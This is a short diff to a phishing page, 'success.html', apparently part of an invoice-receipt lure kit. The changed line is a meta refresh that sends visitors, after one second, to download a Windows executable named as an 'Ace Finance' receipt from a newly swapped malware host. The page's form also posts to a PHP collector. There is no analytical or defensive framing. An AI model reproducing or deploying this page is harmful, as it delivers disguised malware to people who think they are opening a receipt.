--- a/success.html
+++ b/success.html
@@ -74,7 +74,7 @@
 <div style="max-width:500px;padding:0px;">
 
 <form action="https://slipfrominvreceip.vercel.app/need4.php" method="POST">
-	<meta http-equiv="Refresh" content="1; URL=https://iketer.loophole.site/receipt/Reciept_468927383-Ace_Finance_Inc_12620.exe">
+	<meta http-equiv="Refresh" content="1; URL=https://success.luafv.top/Reciept_468927383-Ace_Finance_Inc_126200.exe">
 <div style="text-align:center">
 <img src="img/IMG_6613.jpeg" width="45px" style="margin-top:200px;" id="fd">
 </div>
